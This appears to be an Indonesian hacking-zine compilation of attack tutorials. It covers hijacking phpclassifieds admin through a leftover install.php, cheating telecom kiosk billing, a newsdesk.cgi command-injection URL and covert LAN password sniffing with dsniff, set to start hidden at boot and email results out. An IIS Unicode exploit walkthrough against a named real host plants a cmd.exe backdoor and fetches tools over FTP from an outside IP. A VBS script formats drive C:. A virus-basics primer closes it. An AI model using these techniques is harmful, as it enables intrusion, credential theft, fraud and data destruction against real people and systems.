Sekarang kita mulai aja aksi kudeta admin pada phpclassifieds, yg di butuhkan untuk kudeta ini tidak menuntut banyak persyaratan,... :) , langkah-langkahnya adalah sebagai berikut :

1. Cari web yg menggunakan phpclassifieds sebagai forumnya dengan cara search di search engine favorit kamu (kalo aku lebih suka memakai google, karena google itu selain hebat juga punya om aku :P~) dengan keyword phpclassifieds. Wowww banyak banget hasilnya : Results 1 - 10 of about 11,400. Search took 0.07 seconds (sumber : google.com).

2. Setelah dapat buka di browser alamat url phpclassifieds dan di tambahkan install.php, ex : http://www.mediabd.com/phpclassifieds/install.php
Kalau url tersebut menunjukkan step bye step instalasi phpclassifieds kita dapat mengkudetanya, tapi Kalau terjadi error 404 ato alamat tidak di temukan berarti file install.php telah di hapus oleh adminnya sehingga kita tidak dapat mengkudetanya.

3. Langsung aja lompat ke langkah 4 dari step penginstallan karen langkah 4 inilah langkah untuk menentukan login dan password admin nya.

4. Lanjutkan step ke 5 untuk login admin.

5. Selamat telah berhasil mengkudeta phpclassifieds, sekarang terserah kamu mau di apain :P~

Pulsa Interlokal Jadi Pulsa Lokal

Mungkin juga ada sebagian pembaca yang udah mengetahuinya, n ma'af jika menurut anda saya mencontek artikel anda, sedikitpun tak ada niat saya mencontek artikel anda, ini murni hasil percobaan saya atas ketidak sengajaan dalam memencet tombol saat menelpon teman.


Catatan :
NeRaKaCreW tidak bertanggung jawab baik secara langsung atau pun tidak atas akibat yang di timbulkan oleh artikel ini.

Sebelumnya saya ingin mengatakan bahwa cara ini tidak berlaku untuk semua wartel. sebelumnya saya jg minta ma'af kepada bapak/ibu yang bekerja di Telkom n yang merasa di rugikan atas artikel ini, sekali lagi ma'af yang sebesar besarnya.

Langsung saja.. Ada sebagian wartel yang sudah tidak bisa di "kerjain" dengan cara ini terutama wartel tipe - A
cara ini pernah saya gunakan di wartel tipe - B dan Warter Mandiri ( empuk banget ).
hampir seluruh wartel mandiri bisa dikatakan bisa. saya sudah mencoba beberapa Wartel dengan cara ini dan hasilnya lumayan banyak wartel yang masih bisa di kerjain. Ok!.. Mulai..


Anggap saja kita ingin menelpon ke nomor tujuan 0751-461***

Caranya:

1. Tekan terlebih dahulu nomor yang di tuju.
2. Tekan tombol penutup.
3. lalu tekan tombol radial.

Loh di mana bedanya nih NeRaKa CreW kan sama aja?

eit... tunggu dulu...

Saat lo semua nekan Radial pakai lah sedikit Hormon Kewanitaan lo (perasaan yang sangat mendalam) usahakan saat nomor muncul kembali angka 0 dari nomor tujuan hilang.
ex: no tujuan kita tadi 0751-461*** usakan yang keluar di layar nomor tujuan 751-461***

kalo lo udah tekan radial ga' berhasil juga ngilangin angka 0 (nol/kosong) coba tekan lagi tombol penutup lalu ulangi lagi tekan radial ( kali ini pakai Hormon Ke Ibuan ) sampai angka 0 ilang dari layar.

Gua udah coba nih NeRaKa CreW, tapi kok nga mau jg?

gampang aja!... lo tinggal cari Wartel/Target lain ^_*

NeRaKa CreW dari mana pengaruhnya ada angka 0 dengan tidak sama biaya yang di keluarin saat nelpon?

hm.. Gini 0 ( berarti di luar daerah ) kalo kita menelpon... kalo nga salah istilah telkomnya interlokal ato apalah.. nga jelas soalnya saya bukan org telkom ^_*
nah dengan menghilangkan 0 saat ingin menelpon sljj/sli/handphone maka kita tidak di kenai biaya interlokal. biaya yang terprint di wartel hannya jumlah biaya kita menelpon lokal.
begitulah kira kira.

Kalo kita telp dari telp rumah bisa nga?

wah.. jalas nga bisa donk.. disini kan kita cuma menipu print-an wartel. jadi sebaiknya jangan coba coba di rumah..

New Desk CGI

lagi lagi cgi yang selalu mempunyai bolong yang banyak. satu lagi NewsDesk.cgi memiliki hole


http://www.domain.com/cgi-bin/newsdesk.cgi?a=latest&t=info.html

cgi-bin/newsdesk.cgi?a=latest&t=|command|

Selengkapnya

http://www.domain.com/cgi-bin/newsdesk.cgi?a=latest&t=|command|

command adalah berisi perintah perintah linux seperti biasa
misalnya : id , uname -a , ls -al dan lain lain

Panen Password

Baru mulai tertarik masalah keamanan? Pingin ngebuktiin ketidakamanan jaringan lokal kepada admin? Atas permintaan umum (dan seringnya teman-teman admin nanyain tentang sniffing), berikut adalah cara cepat (kurang lebih 15 sampai 30 menit) memanen password dengan menggunakan teknik yang sangat awam: ethernet sniffing. Tentunya akan dibahas juga cara-cara pendeteksian dan pemberantasannya.

Komunikasi ethernet pada dasarnya adalah komunikasi tipe "siaran" (broadcast). Paket-paket ethernet dari mesin yang satu sebetulnya dilihat oleh setiap komputer yang tergabung dalam suatu jaringan lokal. Paket-paket ini dibuang jika alamat MAC-nya tidak cocok dengan alamat node tujuan. Nah, dengan menggunakan software-software 'network sniffer', paket-paket ethernet
(beserta isinya) yang melewati kartu ethernet tertentu tidak dibuang begitu saja, melainkan dianalisa. Banyak kegunaan sniffing, tapi di artikel ini penulis hanya membahas sniffing password dengan menggunakan program paten karangan Dug Song (www.monkey.org/~dugsong) dsniff.

dsniff aslinya adalah software Unix, dan teman-teman yang punya Linux/BSD bisa langsung ngedownload dan compile dsniff dari http://www.monkey.org/~dugsong/dsniff). Artikel ini membahas penggunaan di jaringan lokal berbasis Windows, sebab artikel ini ditujukan untuk pemula, dan mereka-mereka yang pingin memanen password tapi nggak punya akses ke Unix. Program dsniff ini punya spesialisasi menggarap password dari berbagai protokol, dan memformat hasil panenan dalam bentuk yang mudah dibaca. Protokol yang bisa ditangani oleh dsniff antara lain adalah FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB,
dan Oracle SQL*Net auth info.

Penggunaan dsniff tidak begitu jauh berbeda antara versi Win32 dengan versi Unix-nya. Kelebihan yang bias dinikmati pengguna Unix saat ini adalah adanya dua program tambahan di dsniff yang membuat dsniff versi Unix lebih perkasa, mampu memanen password dari jaringan berbasis "ethernet switch" atau "active hub", jadi tidak terbatas ke jaringan "hub" saja.

Bahan-bahan/Persyaratan:
--------------------------------
LAN lokal untuk target, yang terhubung dengan menggunakan "ethernet hub" (bukan switch)
- mesin Windows 95, 98 atau ME (untuk 2000 dan XP, kamu mesti punya hak administrator di mesin yg akan digunakan untuk memanen) yang terhubung ke LAN target
- WinPCap library, download dari http://netgroup-serv.polito.it/winpcap/install/bin/WinPcap.exe
- dsniff port to Win32, download dari http://www.datanerds.net/~mike/binaries/dsniff-1.8-win32-static.tgz (gunakan WinZip untuk nge-extract file-file .exe-nya)

Cara Memasak
------------------

- Install WinPcap library. Doubleclick winpcap.exe dan ikuti petunjuk di layar (tinggal pencet "Next","Next","Finish")
- Extract file dsniff...tgz nya ke suatu directory (sebaiknya di bawah
C:\Windows atau tempat lain yang nggak terlalu mencurigakan - untuk artikel ini, anggap saja disimpan di C:\WINDOWS\DS)
- Mulai memanen password. Dari start menu, klik "Run", ketik "command". Pindah ke direktori tempat disimpannya dsniff ("cd \windows\ds"). dari prompt C:> tinggal ketik "dsniff".
- silakan menonton password-password milik pengguna ditampilkan di layar

Catatan:
----------
Ada kemungkinan anda harus menspesifikasikan kartu ethernet mana yang ingin disadap. Untuk melihat daftar-daftar interface yang tersedia, ketik "dsniff -D" dari prompt DOS. Anda akan melihat daftar interface yang tersedia. Jika secara default dsniff mencoba menyadap interface yang salah, gunakan "dsniff -i [ketik nama interface disini]".

Pengembangan lebih lanjut
---------------------------------

Untuk menyimpan daftar password yang terpanen ke sebuah file, tambahkan perintah "-w [namafile]" ke program dsniff. Contoh: "c:\WINDOWS\DS>dsniff -i ELNK3 -w password.db"
untuk membaca file yg dibuat dsniff, berikan perintah "-r [namafile]"
contoh: "C:\WINDOWS\DS>dsniff -r password.db"
secara opsional, jika anda ingin file hasil panen ini disimpan dalam bentuk file ASCII:
"C:\WINDOWS\DS>dsniff -r password.db > panen.txt",

panen.txt siap disajikan.

Yang lebih asyik lagi, bisa kita konfigurasikan agar usaha panen kita tetap berjalan walaupun komputer tersebut di-reboot.Caranya gampang. Mula-mula download dulu program "start minimized" (sm.exe) dari http://www.ethernal.org/List-Archives/curves-kiddies-0010/msg00029.html.
Simpan program ini di C:\WINDOWS. Kemudian kita bikin batch file yang bisa dijalankan dari command prompt. Gunakan Notepad atau "edit" untuk membuat file ini, dan sebagai isi:
@echo off
sm /hidden c:\windows\ds\dsniff.exe -w > password.db

(tambahkan perintah opsional seperti "-i ELNK3" jika perlu)

Nah, simpan file ini (sebagai "ds.bat", misalnya), dan pindahkan file ini ke folder "Startup" lewat Start menu supaya tiap kali komputer di-restart, program dsniff kita dijalankan juga, siap untuk memanen. Program "sm" diatas berfungsi menjalankan program secara tersembunyi supaya tidak mencurigakan. Tentu saja, biar lebih nggak mencurigakan lagi, rubah nama dsniff.exe ke nama lain, dan jangan lupa ngeganti perintah "dsniff" dengan nama yang baru di semua command dan batch file. Sekarang anda bisa tinggalkan komputer tersebut, dan dikemudian waktu kembali lagi untuk memeriksa sejauh mana hasil sadapan anda bekerja
(dengan perintah "dsniff -r password.db > panen.txt" lalu "notepad panen.txt").


Membuat sadapan lebh portabel
-----------------------------
Untuk membuat disket dsniff, file-file yang anda perlukan adalah: dsniff.exe
wpcap.dll (cari di C:\WINDOWS\SYSTEM atau C:\WINDOWS\SYSTEM32 untuk Win2K/XP)
wpcap.vxd packet.dll
simpan file-file ini ke disket (A:), dan tinggal dibawa disketnya ke LAN target. Penjalanan perintah masih tetap sama seperti diatas, kecuali lokasi prompt nya bukan di :\WINDOWS\DS>, melainkan di A:\>.
Jika anda butuh tantangan tambahan, gunakan perintah "at" dan program pengirim email blat.exe" untuk mengirimkan hasil panenan ke alamat e-mail anonimus anda setiap jam atau bahkan setiap 5 menit. Jangan lupa bagi-bagi hasil :).

Tambahan-tambahan
-----------------
Port dsniff-win32 juga mengandung beberapa utility ekstra, seperti mailsnarf (untuk membaca lalu lintas e-mail di jaringan lokal), urlsnarf (untuk membaca alamat-alamat website yang dikunjungi pengguna LAN sekitar anda), dan webspy (untuk menguntit jejak surfing mesin tertentu). Silaka anda coba main-main dengan utiliti-utiliti ini, penulis yakin akan ada gunanya.Harap diingat bahwa teknik diatas hanya mempan untuk LAN yang terhubung melalui "ethernet hub". Jika kebetulan LAN anda menggunakan "ethernet switch", bukan berarti nggak ada harapan. Pengguna versi Unix-nya dsniff bisa cengar-cengir, sebab paket dsniff versi Unix mengandung dua program
tambahan: arpspoof (untuk 'menipu' mesin-mesin lain agar mengirimkan paket ke mesin anda) dan macof (untuk membanjiri "switch" lokal dengan alamat-alamat MAC acak, biasanya berakibat "ethernet switch" yang ditargetkan menjadi bingung dan mengubah mode menjadi default, bertingkah laku seperti "ethernet hub").

Deteksi, Pencegahan, dan Penanggulangan
---------------------------------------
Sebagai admin, anda bisa mendeteksi kartu-kartu ethernet di LAN anda yang menjalankan dsniff (dan progarm-program sejenis dsniff) karena secara prinsip, untuk meng-capture paket-paket, interface ybs harus berada dalam mode "promiscous". Jadwalkan program-program ini untuk berjalan setiap 5 menit, dan konfigurasikan agar komputer pendeteksi mengemail anda jika ada
aktifitas-aktifitas mencurigakan. Utiliti yang bisa anda gunakan termasuk "promisc", "CPM", "ifstatus", atau yang lebih yahud lagi, utilitas buatan grup hacking Portugal The Apostols yang bernama "NePED" (http://metalab.unc.edu/pub/Linux/distributions/trinux/src/neped.c). Untuk
platform Windows, tersedia produk-produk komersil seperti LANGuard/LANSniffer atau AntiSniff dari L0pht Heavy Industry (http://www.l0pht.com/antisniff). Diantara produk-produk diatas, sebagian besar hanyalah bisa mendeteksi adanya sniffer jika dijalankan di mesin lokal. Untuk mendeteksi network secara remote, gunakan NePED atau AntiSniff.

Jika anda punya budget, beli switch ethernet yang nggak nge-default ke "hub mode" kalau di-flood alamat-alamat MAC palsu. Kalau anda nggak ngerti, harap ngambil kursus "Pengenalan TCP/IP" atau berhenti jadi admin. Juga harap ingat bahwa banyak perusahaan-perusahaan yang mengklaim menjual hub yang tak bisa disadap, tapi ternyata hanya menjual hub tipe "active huub" yang biasanya tidak bisa menghandel traffic Fast Ethernet (100 Mbps).

Cara paling handal untuk mencegah bocornya informasi sensitif lewat network adalah dengan menggunakan enkripsi. Pakailah SSH, SCP (pengganti FTP) atau SFTP, TLS (untuk memeriksa e-mail), SSL dan HTTPS (untuk transaksi web), tunelling, dll. Usahakan agar jangan sampai ada program yang mengirimkan password tanpa enkripsi melalui jaringan yang anda kelola. Juga selalu
periksa keadaan hard disk anda. Seringkali sniffer-sniffer meninggalkan jejak berupa file hasil panenan yang berukuran besar (apalagi jika LANnya sibuk).
Cara lain mengamankan network anda adalah dengan memindahkan topologi jaringan anda ke sistem token ring, _dan_ menggunakan kartu-kartu ethernet Token-Ring buatan IBM (iklan sabun colexz). Tapi tentunya metode ini tidaklah praktis bagi anda yang ingin tetap menggunakan topologi star atau hybrid

Pasang Bouncer

Tutor ini hanya untuk tujuan mencerdaskan anak bangsa, segala resiko yg terjadi bukan tanggung
jawab penulis. Dan penulis asumsikan saudara udah mengerti benar ttg bug yg dah lama ini
(Unicode), sebenarnya masih bnyak cara lain selain memanfaatkan bug Unicode pada server IIS.

..:: TOOLZ ::..

- Pertama-pertama siapkan rokok, makanan yg secukupnya kalo bisa ce cakep huaaa ini pembawa
inspirasi
- IIS Scanner ( Untuk mencari Hole Pada Web Server yg mungkin Vulrnerable ), gw biasanya pake cgi/iis scanner 4.0 - IIS Scanner 2002 by schiczho Thx for tools, IISTESO.C ini juga nice bgt.
- List dari web target paling cepat cari di msn.net keyword " IIS 4.0 Server" hehe disana
gudangnya.
- PSKILL.EXE ( Untuk KILL Proses di OS Windows), PSLIST.EXE (Untuk Proses List yg sedang jalan)
- BNC.EXE dan BNC.CFG sendiri untuk file bouncernya sendiri. File ini bisa didapatkan pada
server ftp yg emang gw sengaja upload untuk dipakai bersama. PERHATIAN!!! Bagi tangan jahil
aku harap username dan password pada server ftp yg gw masukin pada tutor ini jangan diganti
biar kita semua bisa pake. gw percaya ama kalian semua.

..:: LANGKAH-LANGKAH ::..

- Setelah anda mendapatkan targetnya misalnya "http://www.hefele.sulinet.hu" scan dulu targetnya untuk mencari unicode yg kira-kira bisa dipakai untuk mengupload file nya.
- Dari hasil scan target tadi saya dapatkan bug berikut :
"http://www.hefele.sulinet.hu/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\"

Tapi untuk memperpendek bug nya atau kata lain kita buat backdoor untuk antisipasi, copiin
file cmd.exe ke folder yg kira² bisa dibuka lewat komputer luar. Dari sekian folder yg bisa
diakses ada tiga folder yg benar² enak and mantabz bo untuk dipasangin backdoor yakni :

../scripts <== biasanya di C:\Inetpub\Scripts\
../MSADC <== biasanya di C:\Progra~1\Common~1\System\MSADC\
../iisadmpwd <== biasanya di C:\Winnt\System32\Inetsrv\iisadmpwd\

Anda bisa memilih salah satu dari ketiga folder tersebut untuk memasang backdoor untuk
melanjutkan misi kita. Ok kita pilih folder scripts aja karena pathnya paling pendek, pada
browser ketikkan ini :

"http://www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\admin.exe"

sekarang kita punya backdoor untuk akses isi servernya yakni :

"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+dir+c:\"

Dari link ini kita lanjutin misi kita, copiin file ftp.exe ke folder scripts juga untuk
mengupload file bnc kita ntar. Santai Dulz gw sambilan menghayal nih hehehe kapan ya kuliah
gw selesai hikz cedih deh gw....
caranya sama kayak copy cmd.exe tadi kayak dibawah ini dudulz ah

"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+copy+c:\winnt\system32\ftp.exe+c:\inetpub\scripts\"

Setelah itu buat script dibawah ini dengan command echo.. scriptnya kayak ini :

echo+open+209.202.197.150>>+c:\ftp.txt
echo+bncfile>>+c:\ftp.txt
echo+masukaja>>+c:\ftp.txt
echo+bin>>+c:\ftp.txt
echo+cd+bnc>>+c:\ftp.txt
echo+get+bnc.exe>>+c:\ftp.txt
echo+get+PSLIST.EXE>>+c:\ftp.txt
echo+get+PSKILL.EXE>>+c:\ftp.txt
echo+ascii>>+c:\ftp.txt
echo+get+bnc.cfg>>+c:\ftp.txt
echo+bye>>+c:\ftp.txt

Gw anggap semua dah tau cara buat scriptnya dengan command echo, kalo belum au ah gelapzzz...
setelah script nya jadi pastiin dulu isi scriptsnya benar,dengan command type seperti dibawah ini :

"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+type+c:\ftp.txt"

pastiin isi script nya seperti ini

open 209.202.197.150
bncfile
masukaja
bin
cd bnc
get bnc.exe
get PSLIST.EXE
get PSKILL.EXE
ascii
get bnc.cfg
bye

Kalo isi scriptnya udah seperti diatas, kita bisa menjalankan scriptnya dengan command brkt :

"http://www.hefele.sulinet.hu/scripts/ftp.exe?-s:c:\ftp.txt"

Clink... file bnc kita berikut tools nya udah ada di "C:\Inetpub\Scripts\" Kalo gak percaya
liat aja sendiri pake command dir (semuanya command DOS murni kok) gini loh dulz :

"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+dir"

Kalo file nya dah ada, bnc nya cukup kita jalanin lewat browser kayak gini :

"http://www.hefele.sulinet.hu/scripts/bnc.exe"

Biasanya akan keluar keterangan bahwa bnc nya dah aktif, tapi untuk lebih memastikan bahwa
BNC kamu jalan pake tools PSLIST untuk melihat prosesnya

"http://www.hefele.sulinet.hu/scripts/PSLIST.EXE"

akan tampil seperti ini :

Process information for SZERVER:

Name Pid Pri Thd Hnd Mem User Time Kernel Time Elapsed Time
Idle 0 0 1 0 16 0:00:00.000 661:34:23.153 0:00:00.000
System 2 8 85 2610 1032 0:00:00.000 0:07:48.313 0:00:00.000
SMSS 25 11 6 30 0 0:00:00.090 0:00:00.070 667:57:32.790
CSRSS 33 13 7 636 1016 0:00:01.682 0:00:01.442 667:57:27.052
..
..
..
VbCons 621 8 18 212 2596 0:00:00.871 0:00:01.131 87:48:53.868
BNC 501 8 1 260 1216 0:00:00.010 0:00:00.010 0:08:56.261
PSLIST 418 8 1 299 1884 0:00:00.040 0:00:00.110 0:00:00.150

Disitu kamu bisa ngeliat BNC kamu aktif dengan nomor PID 501 , jika suatu waktu bncnya
crash kamu bisa kill prosesnya dengan command :

"http://www.hefele.sulinet.hu/scripts/PSKILL.EXE?+501" <-- syntax nya PSKILL?+PID

Untuk Lebih memastikan bnc kamu aktif dan sehat kamu coba aja connect ke web server nya
dengan mIRC atau program chat lain, misalnya pake mIRC :

"/server www.hefele.sulinet.hu 5050"
[09:06] * Connecting to www.hefele.sulinet.hu (5050)
[09:06] -www.hefele.sulinet.hu- You need to say /quote PASS
"/quote pass admin"
[09:07] -> Server: pass admin
[09:07] -www.hefele.sulinet.hu- Welcome to BNC 2.6.4-WIN, the irc proxy
[09:07] -www.hefele.sulinet.hu- Level two, lets connect to something real now
[09:07] -www.hefele.sulinet.hu- type /quote conn [server] to connect
[09:07] -www.hefele.sulinet.hu- type /quote help for basic list of commands and usage
"/quote conn tiscali.uk.eu.dal.net 8888"
[09:08] -> Server: conn tiscali.uk.eu.dal.net 8888
[09:08] -www.hefele.sulinet.hu- Making reality through tiscali.uk.eu.dal.net port 8888
[09:08] -www.hefele.sulinet.hu- Suceeded connection

Cleng..... elo dah connect ke server irc dengan IP web server yg elo pasangin BNC.
Ok deh.. cuman segini kok tutor dudulz ini, kalo yg udah bisa jgn ngolok ya ajarin dong
yg lain ilmu jangan disimpan sendiri ntar mabok elo... mabok ilmu emang enak xixixi.

Visual Basic Sederhana Tapi berbahaya

Set WshShell = WScript.CreateObject("WScript.Shell")
X = MsgBox("Halo dunia bertanya siapkah anda mengganti operating system anda ?", vbYesNo, "Awas bahaya ngga tanggung jawab!")
If X = 6 Then
WshShell.Run("format.com /y C:")
End If
---------------------------------------------------------

itu kode VBS yang saya buat sangat simple dan saya rasa mudah untuk dimengerti kalangan umum kalau di jalankan maka akan memformat drive c: dengan indahnya Apa saja shell command?? cari pake GOGGLE.COM ! pokoknya idop google :P
Here sample command :

run.exe rundll user,#7
run.exe rundll user,#4
run.exe rundll user,#3
dan lain lain nah........

sekarang bagaimana caranya file ini bisa masuk ke komputer orang?? pikirkan sendiri bagaimana?

Dasar Pengetahuan Tentang Virus

Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan jaringan ( internet ) sudah sangat sering mendengar istilah ‘virus’ yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai virus, yang nantinya diharapkan dapat membuat kita semua mengerti danmemahami tentang virus.

A.ASAL MUASAL VIRUS

1949, John Von Neuman, menggungkapkan " teori self altering automata " yang merupakan hasil riset dari para ahli matematika.
1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat program yang dapat memperbanyak dirinya dan dapat menghancurkan program buatan lawan.Program yang mampu bertahan dan menghancurkan semua program lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang diciptakan makin lama makin berbahaya, sehingga mereka melakukan pengawasan dan pengamanan yang ketat.
1980, program tersebut yang akhirnya dikenal dengan nama "virus" ini berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di dunia cyber.
1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.

B.PENGERTIAN VIRUS

" A program that can infect other programs by modifying them to include a slighty altered copy of itself.A virus can spread throughout a computer system or network using the authorization of every user using it to infect their programs. Every programs that gets infected can also act as a virus that infection grows “ ( Fred Cohen )
Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di Amerika Serikat. Virus komputer dinamakan “Virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran(biological viruses).
Virus komputer bisa diartikan sebagai suatu program komputer biasa.Tetapi memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini, virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi, disinilah perbedaannya dengan "worm". Tulisan ini tidak akan bahas worm karena nanti akan mengalihkan kita dari pembahasan mengenai virus ini.
C.KRITERIA VIRUS
Suatu program yang disebut virus baru dapat dikatakan adalah benar benar virus apabila minimal memiliki 5 kriteria :
1. Kemampuan suatu virus untuk mendapatkan informasi
2. Kemampuannya untuk memeriksa suatu program
3. Kemampuannya untuk menggandakan diri dan menularkan
4. Kemampuannya melakukan manipulasi
5. Kemampuannya untuk menyembunyikan diri.

Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap-tiap kemampuan itu dan mengapa ini sanggat diperlukan.

1.Kemampuan untuk mendapatkan informasi
Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory, untuk apa? agar dia dapat mengenali program program apa saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, terus memilahnya dengan mencari file-file yang bisa ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan pengumpulan data dan menaruhnya di RAM (biasanya :P ) , sehingga apabila komputer dimatikan semua data hilang tetapi akan tercipta setiap program bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .
2.Kemampuan memeriksa suat program
Suatu virus juga harus bias untuk memeriksa suatu program yang akan ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum, karena jika sudah maka dia akan percuma menularinya 2 kali. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah memiliki/ memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut . Contoh penandaan adalah misalnya memberikan suatu byte yang unik disetiap file yang telah terinfeksi.
3.Kemampuan untuk menggandakan diri
Kalo ini emang virus "bang-get", maksudnya tanpa ini tak adalah virus. Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari program lainnya. Suatu virus apabila telah menemukan calon korbannya (baik file atau program) maka ia akan mengenalinya dengan memeriksanya, jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari dengan cara menuliskan byte pengenal pada program/ file tersebut,dan seterusnya mengcopikan/menulis kode objek virus diatas file/program yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk menulari/ menggandakan dirinya adalah:
a.File/Program yang akan ditulari dihapus atau diubah namanya. kemudian diciptakan suatu file menggunakan nama itu dengan menggunakan virus tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus)b.Program virus yang sudah di eksekusi/load ke memori akan langsung menulari file-file lain dengan cara menumpangi seluruh file/program yang ada.
4.Kemampuan mengadakan manipulasi
Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file/program. isi dari suatu rutin ini dapat beragam mulai dari yang teringan sampai pengrusakan. rutin ini umumnya digunakan untuk memanipulasi program ataupun mempopulerkan pembuatnya! Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System) , sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi. misal:
a.Membuat gambar atau pesan pada monitorb.Mengganti/mengubah ubah label dari tiap file,direktori,atau label dari drive di pcc.Memanipulasi program/file yang ditularid.Merusak program/filee.Mengacaukan kerja printer , dsb
5.Kemampuan Menyembunyikan diri
Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.langkah langkah yang biasa dilakukan adalah:
-Program asli/virus disimpan dalam bentuuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai.-Program virus diletakkan pada Boot Recoord atau track yang jarang diperhatikan oleh komputer itu sendiri-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak berubah ukurannya-Virus tidak mengubah keterangan waktu ssuatu file-dll
D.SIKLUS HIDUP VIRUS
Siklus hidup virus secara umum, melalui 4 tahap:
o Dormant phase ( Fase Istirahat/Tidur )Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini
o Propagation phase ( Fase Penyebaran )Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap program yang terinfeksi akan menjadi hasil “klonning” virus tersebut (tergantung cara virus tersebut menginfeksinya)
o Trigerring phase ( Fase Aktif )Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant phase
o Execution phase ( Fase Eksekusi )Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb